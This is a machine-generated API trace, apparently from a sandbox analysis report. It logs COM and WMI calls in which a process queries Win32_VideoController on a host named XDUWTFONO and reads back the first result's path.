	[0222.682] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83b6a8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca28 | out: ppvObject=0x1c80ca28*=0x1b8077f0) returned 0x0
	[0222.682] WbemLocator:IClientSecurity:SetBlanket (This=0x1b8077f0, pProxy=0x1c83b6a8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0222.682] WbemLocator:IUnknown:Release (This=0x1b8077f0) returned 0x2
	[0222.682] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x1
	[0222.682] CoTaskMemFree (pv=0x1b81e8f0) 
	[0222.682] WbemLocator:IUnknown:Release (This=0x1c83e320) returned 0x0
	[0222.683] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83b6a8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c710 | out: ppvObject=0x1c80c710*=0x1b807830) returned 0x0
	[0222.683] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c790 | out: ppvObject=0x1c80c790*=0x0) returned 0x80004002
	[0222.685] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c528 | out: ppvObject=0x1c80c528*=0x0) returned 0x80004002
	[0222.686] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x3
	[0222.686] CoGetContextToken (in: pToken=0x1c80c3e0 | out: pToken=0x1c80c3e0) returned 0x0
	[0222.686] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c3a0 | out: ppvObject=0x1c80c3a0*=0x1b807718) returned 0x0
	[0222.686] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b807718, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c3d0 | out: pCid=0x1c80c3d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0222.686] WbemLocator:IUnknown:Release (This=0x1b807718) returned 0x3
	[0222.686] CoGetContextToken (in: pToken=0x1c80c3b0 | out: pToken=0x1c80c3b0) returned 0x0
	[0222.686] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x4
	[0222.686] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c8 | out: ppvObject=0x1c80c4c8*=0x1b807800) returned 0x0
	[0222.686] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x4
	[0222.686] WbemLocator:IRpcOptions:Query (in: This=0x1b807800, pPrx=0x1b807830, dwProperty=2, pdwValue=0x1c80c538 | out: pdwValue=0x1c80c538) returned 0x80004002
	[0222.687] WbemLocator:IUnknown:Release (This=0x1b807800) returned 0x3
	[0222.687] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x2
	[0222.687] CoGetContextToken (in: pToken=0x1c80c8b0 | out: pToken=0x1c80c8b0) returned 0x0
	[0222.687] CoGetContextToken (in: pToken=0x1c80c7f0 | out: pToken=0x1c80c7f0) returned 0x0
	[0222.687] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x3
	[0222.687] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x1c80c930*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80c910 | out: ppvObject=0x1c80c910*=0x1c83b6a8) returned 0x0
	[0222.687] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x3
	[0222.687] WbemLocator:IUnknown:Release (This=0x1c83b6a8) returned 0x2
	[0222.687] WbemLocator:IUnknown:Release (This=0x1c83b6a8) returned 0x1
	[0222.687] CoGetContextToken (in: pToken=0x1c80ceb0 | out: pToken=0x1c80ceb0) returned 0x0
	[0222.687] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x2
	[0222.688] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca80 | out: ppvObject=0x1c80ca80*=0x1b807830) returned 0x0
	[0222.688] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x2
	[0222.688] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x1
	[0222.688] CoGetContextToken (in: pToken=0x1c80cb50 | out: pToken=0x1c80cb50) returned 0x0
	[0222.688] CoGetContextToken (in: pToken=0x1c80ca90 | out: pToken=0x1c80ca90) returned 0x0
	[0222.688] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x2
	[0222.688] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x1c80cbd0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80cbb0 | out: ppvObject=0x1c80cbb0*=0x1c83b6a8) returned 0x0
	[0222.688] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x2
	[0222.688] WbemLocator:IUnknown:AddRef (This=0x1c83b6a8) returned 0x3
	[0222.689] IWbemServices:ExecQuery (in: This=0x1c83b6a8, strQueryLanguage="WQL", strQuery="select * from Win32_VideoController", lFlags=16, pCtx=0x0, ppEnum=0x1c80d048 | out: ppEnum=0x1c80d048*=0x1c844cc8) returned 0x0
	[0222.697] IUnknown:QueryInterface (in: This=0x1c844cc8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc58 | out: ppvObject=0x1c80cc58*=0x1c844cd0) returned 0x0
	[0222.697] IClientSecurity:QueryBlanket (in: This=0x1c844cd0, pProxy=0x1c844cc8, pAuthnSvc=0x1c80cc50, pAuthzSvc=0x1c80cc4c, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48, pImpLevel=0x1c80cc64, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60 | out: pAuthnSvc=0x1c80cc50*=0xa, pAuthzSvc=0x1c80cc4c*=0x0, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48*=0x6, pImpLevel=0x1c80cc64*=0x2, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60*=0x1) returned 0x0
	[0222.697] IUnknown:Release (This=0x1c844cd0) returned 0x1
	[0222.697] IUnknown:QueryInterface (in: This=0x1c844cc8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cbf8 | out: ppvObject=0x1c80cbf8*=0x1b807fb0) returned 0x0
	[0222.697] IUnknown:QueryInterface (in: This=0x1c844cc8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cb88 | out: ppvObject=0x1c80cb88*=0x1c844cd0) returned 0x0
	[0222.697] IClientSecurity:SetBlanket (This=0x1c844cd0, pProxy=0x1c844cc8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0222.704] IUnknown:Release (This=0x1c844cd0) returned 0x2
	[0222.704] WbemLocator:IUnknown:Release (This=0x1b807fb0) returned 0x1
	[0222.704] CoTaskMemFree (pv=0x1b81e7a0) 
	[0222.705] IUnknown:QueryInterface (in: This=0x1c844cc8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c830 | out: ppvObject=0x1c80c830*=0x1b807fb0) returned 0x0
	[0222.705] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807fb0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8b0 | out: ppvObject=0x1c80c8b0*=0x0) returned 0x80004002
	[0222.707] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807fb0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c648 | out: ppvObject=0x1c80c648*=0x0) returned 0x80004002
	[0222.708] WbemLocator:IUnknown:AddRef (This=0x1b807fb0) returned 0x3
	[0222.708] CoGetContextToken (in: pToken=0x1c80c500 | out: pToken=0x1c80c500) returned 0x0
	[0222.708] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807fb0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c0 | out: ppvObject=0x1c80c4c0*=0x1b807e98) returned 0x0
	[0222.708] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b807e98, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c4f0 | out: pCid=0x1c80c4f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0222.708] WbemLocator:IUnknown:Release (This=0x1b807e98) returned 0x3
	[0222.708] CoGetContextToken (in: pToken=0x1c80c4d0 | out: pToken=0x1c80c4d0) returned 0x0
	[0222.708] WbemLocator:IUnknown:AddRef (This=0x1b807fb0) returned 0x4
	[0222.708] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807fb0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c5e8 | out: ppvObject=0x1c80c5e8*=0x1b807f80) returned 0x0
	[0222.709] WbemLocator:IUnknown:Release (This=0x1b807fb0) returned 0x4
	[0222.709] WbemLocator:IRpcOptions:Query (in: This=0x1b807f80, pPrx=0x1b807fb0, dwProperty=2, pdwValue=0x1c80c658 | out: pdwValue=0x1c80c658) returned 0x80004002
	[0222.709] WbemLocator:IUnknown:Release (This=0x1b807f80) returned 0x3
	[0222.709] WbemLocator:IUnknown:Release (This=0x1b807fb0) returned 0x2
	[0222.709] CoGetContextToken (in: pToken=0x1c80c9d0 | out: pToken=0x1c80c9d0) returned 0x0
	[0222.709] CoGetContextToken (in: pToken=0x1c80c910 | out: pToken=0x1c80c910) returned 0x0
	[0222.709] WbemLocator:IUnknown:AddRef (This=0x1b807fb0) returned 0x3
	[0222.709] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807fb0, riid=0x1c80ca50*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ca30 | out: ppvObject=0x1c80ca30*=0x1c844cc8) returned 0x0
	[0222.709] WbemLocator:IUnknown:Release (This=0x1b807fb0) returned 0x3
	[0222.709] IUnknown:Release (This=0x1c844cc8) returned 0x2
	[0222.709] IUnknown:Release (This=0x1c844cc8) returned 0x1
	[0222.710] WbemLocator:IUnknown:Release (This=0x1c83b6a8) returned 0x2
	[0222.710] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8380f0, puCount=0x1c80cff0 | out: puCount=0x1c80cff0*=0x2) returned 0x0
	[0222.710] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80cff0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cff0*=0x17, pszText=0x0) returned 0x0
	[0222.710] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80cff0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cff0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.710] CoGetContextToken (in: pToken=0x1c80cbf0 | out: pToken=0x1c80cbf0) returned 0x0
	[0222.710] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0222.710] WbemLocator:IUnknown:AddRef (This=0x1b807fb0) returned 0x2
	[0222.710] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807fb0, riid=0x1c80cc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cc50 | out: ppvObject=0x1c80cc50*=0x1c844cc8) returned 0x0
	[0222.710] WbemLocator:IUnknown:Release (This=0x1b807fb0) returned 0x2
	[0222.710] IUnknown:AddRef (This=0x1c844cc8) returned 0x3
	[0222.710] IEnumWbemClassObject:Clone (in: This=0x1c844cc8, ppEnum=0x1c80d0b0 | out: ppEnum=0x1c80d0b0*=0x1c844e18) returned 0x0
	[0222.715] IUnknown:QueryInterface (in: This=0x1c844e18, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cd08 | out: ppvObject=0x1c80cd08*=0x1c844e20) returned 0x0
	[0222.715] IClientSecurity:QueryBlanket (in: This=0x1c844e20, pProxy=0x1c844e18, pAuthnSvc=0x1c80cd00, pAuthzSvc=0x1c80ccfc, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8, pImpLevel=0x1c80cd14, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10 | out: pAuthnSvc=0x1c80cd00*=0xa, pAuthzSvc=0x1c80ccfc*=0x0, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8*=0x6, pImpLevel=0x1c80cd14*=0x2, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10*=0x1) returned 0x0
	[0222.715] IUnknown:Release (This=0x1c844e20) returned 0x1
	[0222.715] IUnknown:QueryInterface (in: This=0x1c844e18, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cca8 | out: ppvObject=0x1c80cca8*=0x1b8070b0) returned 0x0
	[0222.715] IUnknown:QueryInterface (in: This=0x1c844e18, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc38 | out: ppvObject=0x1c80cc38*=0x1c844e20) returned 0x0
	[0222.715] IClientSecurity:SetBlanket (This=0x1c844e20, pProxy=0x1c844e18, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0222.718] IUnknown:Release (This=0x1c844e20) returned 0x2
	[0222.718] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x1
	[0222.718] CoTaskMemFree (pv=0x1b81e7d0) 
	[0222.718] IUnknown:QueryInterface (in: This=0x1c844e18, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c8d0 | out: ppvObject=0x1c80c8d0*=0x1b8070b0) returned 0x0
	[0222.719] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c950 | out: ppvObject=0x1c80c950*=0x0) returned 0x80004002
	[0222.720] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c6e8 | out: ppvObject=0x1c80c6e8*=0x0) returned 0x80004002
	[0222.721] WbemLocator:IUnknown:AddRef (This=0x1b8070b0) returned 0x3
	[0222.721] CoGetContextToken (in: pToken=0x1c80c5a0 | out: pToken=0x1c80c5a0) returned 0x0
	[0222.721] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c560 | out: ppvObject=0x1c80c560*=0x1b806f98) returned 0x0
	[0222.721] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b806f98, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c590 | out: pCid=0x1c80c590*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0222.721] WbemLocator:IUnknown:Release (This=0x1b806f98) returned 0x3
	[0222.722] CoGetContextToken (in: pToken=0x1c80c570 | out: pToken=0x1c80c570) returned 0x0
	[0222.722] WbemLocator:IUnknown:AddRef (This=0x1b8070b0) returned 0x4
	[0222.722] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c688 | out: ppvObject=0x1c80c688*=0x1b807080) returned 0x0
	[0222.722] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x4
	[0222.722] WbemLocator:IRpcOptions:Query (in: This=0x1b807080, pPrx=0x1b8070b0, dwProperty=2, pdwValue=0x1c80c6f8 | out: pdwValue=0x1c80c6f8) returned 0x80004002
	[0222.722] WbemLocator:IUnknown:Release (This=0x1b807080) returned 0x3
	[0222.722] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x2
	[0222.722] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0222.722] CoGetContextToken (in: pToken=0x1c80c9b0 | out: pToken=0x1c80c9b0) returned 0x0
	[0222.722] WbemLocator:IUnknown:AddRef (This=0x1b8070b0) returned 0x3
	[0222.723] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x1c80caf0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cad0 | out: ppvObject=0x1c80cad0*=0x1c844e18) returned 0x0
	[0222.723] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x3
	[0222.723] IUnknown:Release (This=0x1c844e18) returned 0x2
	[0222.723] IUnknown:Release (This=0x1c844e18) returned 0x1
	[0222.723] IUnknown:Release (This=0x1c844cc8) returned 0x2
	[0222.723] CoGetContextToken (in: pToken=0x1c80ce70 | out: pToken=0x1c80ce70) returned 0x0
	[0222.723] CoGetContextToken (in: pToken=0x1c80cdb0 | out: pToken=0x1c80cdb0) returned 0x0
	[0222.723] WbemLocator:IUnknown:AddRef (This=0x1b8070b0) returned 0x2
	[0222.723] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x1c80cef0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ced0 | out: ppvObject=0x1c80ced0*=0x1c844e18) returned 0x0
	[0222.723] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x2
	[0222.723] IUnknown:AddRef (This=0x1c844e18) returned 0x3
	[0222.724] IEnumWbemClassObject:Reset (This=0x1c844e18) returned 0x0
	[0222.727] IUnknown:Release (This=0x1c844e18) returned 0x2
	[0222.727] CoTaskMemAlloc (cb=0x8) returned 0x1b830100
	[0222.727] IEnumWbemClassObject:Next (in: This=0x1c844e18, lTimeout=-1, uCount=0x1, apObjects=0x1b830100, puReturned=0x1c80d0f8 | out: apObjects=0x1b830100*=0x1c83eb80, puReturned=0x1c80d0f8*=0x1) returned 0x0
	[0222.730] IUnknown:QueryInterface (in: This=0x1c83eb80, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c420 | out: ppvObject=0x1c80c420*=0x1c83eb80) returned 0x0
	[0222.730] IUnknown:QueryInterface (in: This=0x1c83eb80, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c4a0 | out: ppvObject=0x1c80c4a0*=0x0) returned 0x80004002
	[0222.730] IUnknown:QueryInterface (in: This=0x1c83eb80, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c238 | out: ppvObject=0x1c80c238*=0x0) returned 0x80004002
	[0222.730] IUnknown:AddRef (This=0x1c83eb80) returned 0x3
	[0222.730] CoGetContextToken (in: pToken=0x1c80c0f0 | out: pToken=0x1c80c0f0) returned 0x0
	[0222.730] IUnknown:QueryInterface (in: This=0x1c83eb80, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c0b0 | out: ppvObject=0x1c80c0b0*=0x1c83eb88) returned 0x0
	[0222.731] IMarshal:GetUnmarshalClass (in: This=0x1c83eb88, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c0e0 | out: pCid=0x1c80c0e0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0222.731] IUnknown:Release (This=0x1c83eb88) returned 0x3
	[0222.731] CoGetContextToken (in: pToken=0x1c80c0c0 | out: pToken=0x1c80c0c0) returned 0x0
	[0222.731] IUnknown:AddRef (This=0x1c83eb80) returned 0x4
	[0222.731] IUnknown:QueryInterface (in: This=0x1c83eb80, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c1d8 | out: ppvObject=0x1c80c1d8*=0x0) returned 0x80004002
	[0222.731] IUnknown:Release (This=0x1c83eb80) returned 0x3
	[0222.731] IUnknown:Release (This=0x1c83eb80) returned 0x2
	[0222.731] CoGetContextToken (in: pToken=0x1c80c580 | out: pToken=0x1c80c580) returned 0x0
	[0222.731] CoGetContextToken (in: pToken=0x1c80c4c0 | out: pToken=0x1c80c4c0) returned 0x0
	[0222.731] IUnknown:AddRef (This=0x1c83eb80) returned 0x3
	[0222.732] IUnknown:QueryInterface (in: This=0x1c83eb80, riid=0x1c80c600*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80c5e0 | out: ppvObject=0x1c80c5e0*=0x1c83eb80) returned 0x0
	[0222.732] IUnknown:Release (This=0x1c83eb80) returned 0x3
	[0222.732] IUnknown:Release (This=0x1c83eb80) returned 0x2
	[0222.732] IUnknown:Release (This=0x1c83eb80) returned 0x1
	[0222.732] CoTaskMemFree (pv=0x1b830100) 
	[0222.732] CoGetContextToken (in: pToken=0x1c80cf00 | out: pToken=0x1c80cf00) returned 0x0
	[0222.732] IUnknown:AddRef (This=0x1c83eb80) returned 0x2
	[0222.732] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__GENUS", lFlags=0, pVal=0x1c80d070*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d06c*=0, plFlavor=0x1c80d068*=0 | out: pVal=0x1c80d070*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d06c*=3, plFlavor=0x1c80d068*=64) returned 0x0
	[0222.732] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__PATH", lFlags=0, pVal=0x1c80d010*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d00c*=0, plFlavor=0x1c80d008*=0 | out: pVal=0x1c80d010*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x1c80d00c*=8, plFlavor=0x1c80d008*=64) returned 0x0
	[0222.732] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x48
